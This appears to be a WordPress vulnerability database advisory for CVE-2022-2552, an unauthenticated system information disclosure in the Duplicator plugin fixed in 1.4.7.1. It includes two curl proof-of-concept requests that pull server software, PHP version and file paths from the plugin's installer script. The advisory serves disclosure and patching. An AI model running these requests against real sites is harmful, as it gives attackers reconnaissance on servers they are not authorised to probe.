WordPress Plugin Vulnerabilities

Duplicator < 1.4.7.1 - Unauthenticated System Information Disclosure

Description

The plugin does not authenticate or authorize visitors before displaying information about the system such as server software, php version and full file system path to the site.

Proof of Concept

1. curl 'http://example.com/wp-content/backups-dup-lite/dup-installer/main.installer.php?view=1'
2. curl -d view 'http://example.com/wp-content/backups-dup-lite/dup-installer/main.installer.php?debug=1'

Affects Plugins

Plugin icon
duplicator
Fixed in 1.4.7.1

References

CVE
CVE-2022-2552
URL
https://packetstormsecurity.com/files/#167895/
URL
https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2552

Classification

Type
SENSITIVE DATA DISCLOSURE
OWASP top 10
A3: Sensitive Data Exposure
CWE
CWE-200
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
Ihsan Sencan
Submitter
Ihsan Sencan
Submitter website
https://www.securitrust.fr
Verified
Yes
WPVDB ID
6b540712-fda5-4be6-ae4b-bd30a9d9d698

Timeline

Publicly Published
2022-08-01 (about 1 years ago)
Added
2022-08-01 (about 1 years ago)
Last Updated
2023-05-03 (about 6 months ago)

Other

Published
Title
Published
2023-04-19
Title
Active Directory Integration / LDAP Integration < 4.1.1 - Unauthenticated Data Disclosure
Published
2020-12-17
Title
ListingPro < 2.6.1 - Unauthenticated Sensitive Data Disclosure (Usernames, Emails etc)
Published
2023-09-08
Title
EWWW Image Optimizer < 7.2.1 - Sensitive Information Exposure
Published
2022-04-18
Title
VikBooking Hotel Booking Engine & PMS < 1.5.4 - Booking Data Disclosure
Published
2021-08-18
Title
BuddyPress < 9.1.1 - Activation Key Disclosure